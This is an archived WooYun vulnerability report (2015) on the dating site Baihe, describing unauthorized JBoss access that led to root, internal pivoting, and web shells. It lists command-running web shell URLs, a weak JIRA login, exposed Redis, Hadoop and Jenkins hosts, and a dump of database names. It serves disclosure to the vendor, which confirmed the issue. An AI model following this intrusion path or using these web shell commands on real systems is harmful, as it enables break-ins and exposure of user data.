当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139233

漏洞标题:百合网某系统配置不当导致直接影响内网安全(涉及多系统以及数百万用户数据)

相关厂商:百合网

漏洞作者: Croxy

提交时间:2015-09-06 09:39

修复时间:2015-10-23 16:30

公开时间:2015-10-23 16:30

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-06: 细节已通知厂商并且等待厂商处理中
2015-09-08: 厂商已经确认,细节仅向厂商公开
2015-09-18: 细节向核心白帽子及相关领域专家公开
2015-09-28: 细节向普通白帽子公开
2015-10-08: 细节向实习白帽子公开
2015-10-23: 细节向公众公开

简要描述:

A:我去百合网相亲了
B:咋样?结果如何? 找到了没有?
A:我找到了他们的bug
B:。。。。。。。

详细说明:

入口 http://oa.baihe.com:7788/
Jboss未授权访问
Shell地址
http://oa.baihe.com:7788/is/

baihe.jpg


root权限 接下来就是挂个代理
开始~

漏洞证明:

baihe1.jpg

内网打印鸡 挺多的:)

baihe2.jpg

内网好多jboss 成功getshell

http://192.168.22.193/is/cmd.jsp?pwd=023&cmd=whoami
http://192.168.22.174/
http://192.168.22.195/is2/cmd.jsp?pwd=023&cmd=ifconfig
http://192.168.23.106/is2/Browser.jsp?sort=1&dir=%2Fhome%2Fjava%2FD%3A%2Fjboss-4.2.3.GA+CRM%2Fserver%2Fdefault%2Fdeploy%2FAvatarOfflineManage.war%2Fupload
http://192.168.22.174/is2/Browser.jsp
http://192.168.22.153/is2/Browser.jsp
http://192.168.22.127/is2/Browser.jsp
http://192.168.22.108/is2/Browser.jsp
http://192.168.22.106/is2/Browser.jsp
http://192.168.22.98/is2/Browser.jsp
http://192.168.22.76/is2/Browser.jsp
http://192.168.0.230:8080/is2/Browser.jsp


JIRA 平台弱口令 test 123456
http://192.168.0.120:8080/secure/Dashboard.jspa

baihe4.jpg


redis 你们公司人员应该懂得。。 数据就不具体截图了
192.168.22.82
192.168.20.234

baihe5.jpg


百合内部接口

baihe6.jpg


hadoop未授权
http://192.168.22.181:8088/cluster hadoop
http://192.168.22.10:8088/cluster hadoop
内部jenkins未授权访问:(
WIndows7 System权限

baihe7.jpg


最后来点你懂得~~

Database
VARCHAR
information_schema
Baihe_Blog
Baihe_Remind
Baihe_Sysnotice
Crazyicelee
CustomeGetUserLists
CustomeGetUserLists_Test
DuetTest
DynamicDisplay
IM
RealAuth
RealAuthSwap_1
RealAuthSwap_2
RuleManager
User_LoginDate
User_LoginHistory
User_Priv
actEvent
actEventx
advert
advisor
aiQingKeTang
aiqingkt
amon
android0
android1
anti_cheat
app
appEvent
app_2010
app_201210
app_201211
app_201212
app_2012qixi
app_201302
app_20130214
app_201304
app_201309
app_2013520
app_2013flower
app_alltask
app_app20130506
app_autumn
app_bottle
app_cdyjn
app_cupid
app_earnplate
app_game
app_love_at_first
app_lovemarch
app_sddlh
app_sign
app_spring
app_summer
app_task
app_taskCenter
app_xybz
auth
authentication
authsys
avatar
avatar_kafka
avatar_manage
avatar_manage_dev
avatar_parter
avatar_serv
avatar_test
avatar_xq
baihe
baihe-account
baihe-account-test
baihe-at
baihe-kaoqin
baihe-loveBox
baihe-newOpen
baihe-userCloudAccount
baihe-userCloudLog
baihe-userRelation
baiheAD
baiheAdmin
baiheNewSms
baiheOpen
baiheSMS
baihe_behavior
baihe_caiwu
baihe_comm
baihe_db
baihe_emg
baihe_file
baihe_impress
baihe_log
baihe_logo
baihe_lovemap
baihe_lovemap_Dynamic
baihe_monitor
baihe_newgold
baihe_spm
baihe_userCloudMobile
baihe_userCloudSesameCredit
baihe_userPhoto
beijing
bhevent
bugtracker
chengyu
cloud
cloud_usage
cloudbridge
coinaccount
collabtive
commerce
cr_debug
crop_picture
cs
cservice
cuohe
dam
db_ppqy_test
degree
dynamic
editaccess
emotion
emotion_supe
emotion_ucenter
expert
feicheng
feicheng_online
filmcoopoutcall
focusstar
hive
hmon
hunJieTong
indexAuto
invite
iphone0
iphone1
logs
loveAutoPull
loverInDream
marketing
matchBaihe
matcher
medalAction
mediacenter_supersite
mediacenter_ucenter
meet
menagerie
mfc_static
miniHtml5
mobile_baihe
msg_center
msg_center_0_0
msg_center_0_1
msg_center_1
msg_center_1_0
msg_center_2
msg_center_3
msg_center_4
msg_center_5
msg_expand_1
msg_expand_2
msg_expand_3
msg_expand_4
msg_expand_5
msg_rules
mySql_CustomerCare
mybaihe_comm_1
mybaihe_comm_2
mysql
newMini
new_advisor
new_advisor_1030
new_advisor_W
new_profile
newhelp
newinvite
newinvite_baihe
newvip_supe
newvip_ucenter
nmsg_center_1
nmsg_center_2
nmsg_center_3
nmsg_center_4
nmsg_expand_1
nmsg_expand_2
nreg
offlinepms
offpsss
party
passport
passportSendNotice
payment
performance_schema
photo_voice
photograph
phpmsg
place2013
product
profile
profile1
profile_psy
project
qPlus
qquery
recall
refundment
regLog
rman
safeQA
safe_supersite
safe_ucenter
scm
score
search
search120628
searchrecommender
sequence_0_0
sequence_1_0
service_sys
shenhe
shipin
shopex
signIn
smallobject
smallproject
smartemail
smartstar
smon
soasys
solrData
song_test
statistical
storyModify
storynew
study
supe_vip
task
taskCenter
task_public
telesales
telmarket
test
test-1
testCenter
test_msg_center_0_0
test_sequence_0_0
testauth
testcy
testlink
testtortoise
testz
top
tortoise
ubhfreesudi
ucenter
ucenter_vip
user_liked
user_mobile
video
vip
virtualShop
webim
winphone0
winphone1
wmyhb
xact
xiangqi
xiansuo
xingzuo
xx
yuan_fans
yuan_message
yuan_web
yuan_yuan
zentao


良心保证! 没有拖库:(

baihe8.jpg


修复方案:

有啥不清楚的 都可以私信我:)

版权声明:转载请注明来源 Croxy@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-08 16:28

厂商回复:

要增强安全意识

最新状态:

暂无